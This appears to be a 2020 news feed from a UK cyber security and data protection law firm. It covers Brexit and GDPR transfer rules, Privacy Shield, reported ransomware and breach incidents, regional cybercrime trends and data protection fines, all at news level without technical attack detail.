The UK left the EU on 31 January 2020. The transition period lasts until 31 December 2020. During the transition period the GDPR still applies as if we were still in the EU.

At the end of the transition period the Government intends to bring GDPR into UK law which will then sit alongside the Data Protection Act 2018. If no deal incorporating data protection is agreed then the UK will become a third country. Read on to find out what you must be doing now to prepare for this possibility.

Will I need a representative in the EEA.

At the end of the transition period you will need a representative in the EEA if you are offering goods or services to, or monitoring the behaviour of, any individual within the EEA.

Can I send or receive personal data from the EEA?

The Government has announced it will not restrict personal data transfers from the UK to the EEA. Transfers from the EEA to the UK will be governed by the transfer rules. Unless and until the UK obtain adequacy status, which can take some time, an adequate safeguard must be in place. The most common of these is a specifically worded contract.

What you need to do to prepare

You must fully understand and map personal data flows between your organisations and any organisation or individual within the EEA.

Contact us for further information as we have a sister company that can act as your representative in the EEA and prepare any necessary contracts for you. Contact us now for a no obligation quote.

North West Police Trends week commencing 19th July

There were 33 reports across the North West this week.  Jobs of note include:

  • A therapy company suffered a compromise of their Office 365 but believed to have stopped any further incidents from occurring through early mitigation.
  • Ransomware or data extortion attack against a wholesalers, rendering their website useless.
  • Compromise of social housing business e-mail for the purposes of sending out malicious e-mails to others. 

PROTECT – There seems to be a rise once more in reports concerning the compromise of social media accounts for the purposes of fraud.  There are also at least two reports concerning e-mail accounts being compromised to proliferate further phishing and spreading of malicious attachments.

Information Courtesy of: The Cyber Resilience Centre for Greater Manchester

www.cyberresiliencecentre.com

EU publishes note for post Brexit Binding Corporate Rules

The European Data Protection Board (formerly Woking Party 29) has issued an Information Note stating that before the end of the transition period organisations in the UK who have Binding Corporate Rules or who are applying for the same will need to select another Supervisory Authority as the ICO will no longer be suitable as they will not be in the EU.

Should you require a representative in the EU contact us as we can arrange this through our company that will remain based in the EU.

Universities hit by Ransomware attack

As news emerges this week that York University paid hackers for a ransomware attack they suffered in which personal details of staff and students were stolen, it has been revealed that at least 10 universities have lost data due to a ransomware attack. The attack took place in May on Blackbaud, a provider of cloud services to universities

Russia denies Covid-19 vaccine hacking allegations

Last week we reported about the allegations that Russian hackers, almost certainly state backed, had targeted a number of organisations involved in developing a vaccine.

Russia’s ambassador to the UK stated on the BBC’s Andrew Marr Show, “I don’t believe in this story at all, there is no sense in it.”

Foreign Secretary Dominic Raab said it is “very clear Russia did this”.

Privacy Shield invalidated by European Courts

The Court of Justice of the European Union has ruled Privacy Shield as invalid meaning organisations can no longer rely upon Privacy Shield as a means of transferring personal data to the US. Organisations must immediately implement an appropriate safeguard. Green CDL has extensive experience in implementing appropriate safeguards.

Russian spies target Coronavirus vaccine research

According to the National Cyber Security centre Russian hackers, almost certainly backed by Russian intelligence services, have been targeting a number of pharmaceutical and research centres in the UK, US and Canada. These claims have been denied by Dmitry Peskov, President Putin’s Press Secretary.

High profile Twitter accounts hacked in Bitcoin scam

Jeff Bezos, Elon Musk and Bill gates were just some of the big names targeted by hackers who were able to send out tweets from their accounts promising to double the money of anyone sending them bitcoins. The tweets stated that they were giving back to the community and anyone sending $1,000 will be sent back $2,000, the tweets also said it was only open for 30 minutes. John Green, cyber security lawyer from Green CDL says a sense of urgency is a classic technique used by scammers and is almost always a red flag.   

Twitter confirmed that they were successfully targeted by a co-ordinated social engineering attack allowing the hackers access to Twitter’s internal systems and tools. It is not clear how much the hackers made from this.

Gadget makers face ban on easy to guess passwords

As part of plans for a new UK cyber security internet connected devices will be required to come pre-installed with a unique password or require the user to set one before use. Quite often devices come with pre-set passwords such as 000000 and are then not changed by users.

Huawei 5G to be removed from UK by 2027

Mobile providers in the UK are being banned from buying new Huawei 5G equipment after 31st December and must remove all of Huawei’s components from the networks by 2027.

1 in 3 employees want to continue to work from home

According to a survey by Halifax of 3,000 employees 1 in 3 intend to continue working from home after Covid-19 restrictions are lifted. The majority of those questions thought that working from home is a great opportunity to tackle climate change. Emma Green from Green CDL says “this is also a great opportunity for hackers to take advantage of this as the surface area organisation must protect has expanded considerably with employees working from home. “

Increased Risk of Cyber-Attacks for pub goers

Pub and restaurant-goers are exposed as establishments are requiring many users to book online before they arrive, and/or to provide their details for contact tracing purposes. A recent survey highlighted that many establishments have failed to put in place measures to protect their domain from email spoofing and thus phishing attacks. John Green from Green CDL says ” It is essential these establishements take appropriate technical measures to protect the personal data of their customers “

This weeks North West cybercrime trends

There were 30 reports across the North West this week, cyber crimes include: Hacking of e-mail to request the purchase of Amazon vouchers. Reports of Dharma and Sodinokibi ransomware attacks, a business facebook accounts being hacked, fornite hacking and sim jacking

Smartwatch hack could send fake pill reminders to patients

A security flaw has been uncovered with the Smartwatch software used to help elderly patients. Some of the watches are targeted mainly at dementia patients a hacker could even send a reminder to “take pills” as often as they wanted to. Emma Green from GreenCDL says “this is very concerning as a demetia patient could easily tak an accidental overdose” This security flaw has been reported to the manufacturer but is yet to be patched…..

Apology after Aberdeen police officer’s phone number published

An apology has been made to an Aberdeen police officer after his phone number was published online in a data breach. Personal details of the officer was inadvertently contained in an appendix to a report. John Green of GreenCDL says “Sadly, we often see this type of human error in personal data breaches, ensuring appropriate organisational measures and training are in place can help reduce them”.

NCA infultrate EncroChat

An estimated 60,000 people, among them up to 10,000 in Britain, subscribed to France-based EncroChat, which has now been taken down. The system operated on customised Android phones and, according to its website, provided “worry-free secure communications”.Customers had access to features such as self-destructing messages that deleted from the recipient’s device after a certain length of time.

The European Commission prepares for the ECJ invalidating Privacy Shield

The ECJ is due to rule on 16th July as to whether Standard Contractual Clauses will continue to be a valid way of transferring personal data to Third Countries. They maty also adopt a position on the Privacy Shield agreement used for transferring personal data to participating US organisations.

Emma Green from Green CDL says “This is not the first time this has happened, the predecessor to Privacy Shield, Safe Harbor, was invalidated by the ECJ back in 2015 leaving many organisations exposed. This led to a number of large organisations being penalised for not adopting the new agreement.”

Home workers targeted by Russian hacker group Evil Corp

As the majority of workers are now working from home due to the current pandemic Russian hacking group Evil Corp have been taking advantage of this sudden change. Organisations had to adapt almost overnight from protecting a single network to protecting hundreds or even thousands of potential openings. Studies have also shown that home workers are more likely to take security less seriously than they would do when working in the office.

Roblox accounts hacked

User of the online game complained profiles were hacked and sending messages to other users stating “Ask your parents to vote for Trump this year”. Additionally avatars were altered and dressed in similar attire to that of Trump supporters. Users have stated they still had access to their accounts and were able to change their avatars back again.

University of California San Francisco admits to paying ransomware

The university, has admitted to paying hackers $1.14 million following a ransomware attack occurring on their networks. Companies are increasingly paying to retrieve their data despite being advised not to by law enforcement agencies as they see this as their only option. John Green, in house data protection and cyber security lawyer says “prevention is better than cure as quite often there is no cure, it is important organisations do all they can to prevent these attacks occurring in the first place, hackers gaining access is often a very simple and easy attack that could have been prevented with basic measures.”

ICO publish Mobile Phone extraction guidance

An interesting read for all you privacy professionals, check out the guidance here: https://ico.org.uk/media/about-the-ico/documents/2617838/ico-report-on-mpe-in-england-and-wales-v1_1.pdf

Cyber Threats Are The Top Insurance Risk

Research carried out by the  UK insurance firm Gallagher polled 1000 UK business leaders in organisations of various sizes and nearly two-fifths (39%) cited cyber-attacks as one of their biggest concerns. Of these, 82% reported  they do not have specialist insurance. Don’t forget with Cyber Essentials your business receives FREE cyber insurance!

CyberCrime statistics for North West of UK

Increase in ransomware attacks on manufacturing and a school. An Agricultural supplies company was hit with LockBit ransomware. £4,500 paid.

Australia’s government and institutions targeted cyber attack

Prime Minister Scott Morrison says said the cyber attacks were widespread, covering “all levels of government” as well as essential services and businesses. Mr Morrison did not name specific cases but said it had spanned “government, industry, political organisations, education, health, essential service providers and operators of other critical infrastructure”.

Australia targeted by state based cyber attacks

According to Prime Minister Scott Morrison, Australia’s government and various institutions have been targeted in an ongoing sophisticated state-based cyber-attack. The attacks have been happening over many months and continue to increase. Although Mr Morrison did not name specific departments he stated that it had spanned “government industry, political organisations, education, health, essential service providers and operators of critical infrastructure.”

Wiggle investigating cyber attack

Online sports retailer Wiggle is investigating a possible cyber attack after a number of complaints from customers their accounts were showing fake orders they had not placed or they had received emails stating their account details had changed. Wiggle has been criticised for their initial dire response to customers but has since placed an announcement hidden deep on its website.

Amazon Web Services (AWS) thwarts largest ever DDoS cyber attack

DDos attacks are designed to take down websites by flooding them with huge amounts of requests until it crashes. According to Amazon it was hit by an incredible 2.3Tbps of data, to put this in comparison this is around half of all the traffic BT sees on its entire UK network during a normal working day.

1 in 5 experience cyber fraud each year

According to a new report, the Scottish Crime and Justice Survey, 1 in 5 adults who use the internet have experienced some form of cyber fraud.

Foodora data breach affects customers in 14 countries

Online food delivery company Delivery Hero have their Foodora brand has been hit by a data breach affecting over 600,000 customers spanning 14 countries. Although this affected customers in a number of countries across Europe it appears not to have affected customers in the UK. The company is not yet aware of how the data breach occurred.

Tait Towers Manufacturing hit by data breach

The company which manufactures equipment for live events has been hit by a data breach affecting personal and financial informations of its employees. It is understood hackers accessed a server and a number of email accounts. John Green, cyber security lawyer from Green CDL says “It is likely the breach occurred as a result of an employee clicking a link or opening an attachment in an email, something that may well have been prevented by proper training of staff.”

Online retailer Claire’s hit by cyber attack

Online retailer Claire’s and its sister company Icing have been hit by a digital skimming attack. Hackers injected malicious code that intercepted customers details entered during checkout and diverted the information to “claires-assets” domain registered back in March to an unknown third party.

Card details belonging to customer of Intersport in the Balkans stolen

The company managed to fix the issue within several hours, the attack affected customers in Croatia, Serbia, Slovenia, Montenegro and Bosnia Herzegovina.

50% of remote workers Ignoring cyber security

The current pandemic has brought about a forced change for organisations as many employees are working remotely from home. This has resulted in a distinct lack of any IT security team’s ability to focus on the employees and their cyber security. According to Tessian 52% of employees believe that, when they are working from home, they can get away with riskier behaviour putting businesses at risk of cyber attacks.

John Green, in house lawyer at Green CDL, says “It is important that cyber security is, and remains, at the forefront of every employees mind both during the lockdown and in the future, it is important now more than ever to ensure all your staff undertake appropriate working from home and cyber security basic training at regular intervals”.

Honda’s global operations hit by cyberattack

In a statement the Japanese car manufacturer confirmed that a cyberattack has taken place on the Honda network which has impacted their systems globally. They further said that the virus had spread throughout its network affecting its ability to access computers, servers, emails and other services.

Green CDL and Greater Manchester Police talk Cyber Crime and the Law

A recorded webinar hosted by the Cyber Resilience Centre for Greater Manchester with guest speakers Emma Green from Green CDL, Cyber Security and Data Protection lawyer John Green and DSupt Neil Jones from Greater Manchester Police.

Data Breach on Babylon Health’s GP App

Babylon Health admitted to the breach when it was contacted by one of its users who discovered he had been given access to dozens of videos recording of other patient’s consultations.

An investigation revealed a number of other users also had access to consultations with others.

The Open Rights Group have instructed lawyer to lodge a formal complaint with the ICO over the test and trace programme

ORG have a number of concerns over the amount of contact data that will be collected and retained by the Government, in particular following Public Health England stating it would retain “personally identifiable “ data of those who test positive for 20 years.

Part 2 of interview with the Cyber Resilience Centre for Greater Manchester and Emma Green from Green CDL

In the second video of a series of 8 Emma Green from Green CDL talks about the latest trends in cyber security with the Cyber Resilience Centre for Greater Manchester.

Finland issues 3 fines for data protection breaches

The Office of the Data Protection Ombudsman, Finland’s equivalent of the ICO, issues 3 fines:

  • Posti Oy fined €100,000 for not providing sufficient information on data protection rights.
  • Kymen Vesi Oy fined €16,000 for failure to conduct a data protection impact assessment.
  • A third company was fined of €12,500 for the collecting personal data unnecessarily of a job applicant

Friday 5th June 2020

EasyJet faces Group Litigation Order for data breach

A number of law firms are scrambling to sign up claimants in what will likely prove a very costly breach for EasyJet

Armed Forces Launches Cyber Regiment

A new dedicated Cyber Regiment, known as the 13th Signal Regiment, has been formally stood up this week in a bid to mover the armed forces into the information age. The Regiment will lead the way in protecting frontline operations from cyberattacks.

Virus results of Coronavirus patient sent to business by mistake.

Dozens of patients of NHS Orkney had their Coronavirus test results and confidential details sent to a local business by mistake due to “an isolated case of administrative error” according to NHS Orkney.

Anti-racism sites hit by cyberattacks

In the wake of the death of George Floyd cyberattacks against anti-racism websites has shot up 1,120 fold. An increase has also been seen across Government and military websites in the form of DDos (Distributed Denial of Service) attacks, this is where attackers flood a website with traffic to the point it can no longer cope.

Kent PPE firm hit with £800k ransomware attack.

Kent Commercial Services, owned by Kent County Council, has received a demand for £800,000 worth of Bitcoins for stolen data which the hackers threatened to leak on to the dark web. According to the firm no ransomware has been paid and no personal data relating to taxpayers were stolen. The ICO has issued them with data protection advice.

Google being sued for $5bn for tracking in private mode.

A class action ahs been launched in the US against Google for allegedly illegally invading user’s privacy by tracking them when they were browsing in ‘private mode’. Users assume their search history isn’t being tracked when using private mode but this is not the case as admitted by Google but Google denies it is illegal.

London law firm Excello Law, with their lure of compensation of £2,000 or more, are just one of many law firms scrambling to be the first to file for a Group Litigation Order against EasyJet following the data breach announced just a few weeks ag on on 19 May.

Since the coming into effect of the GDPR and the coming into force of The Data Protection Act 2018, the latter specifically stating a person can sue for distress caused by a breach, a staggering number of law firms have jumped on to data breach claiming to be experts in this field.

Applying for a GLO prematurely can land you in hot water as happened in Crossley v Volkswagen Aktiengesellschaft where a firm applied for a GLO prematurely in the VW emissions case and was subsequently ordered to pay the Defendant £450,000.00 in wasted costs.

Despite this businesses should be very concerned at this trend as the costs of any litigation may well considerably dwarf any sanction imposed by the ICO.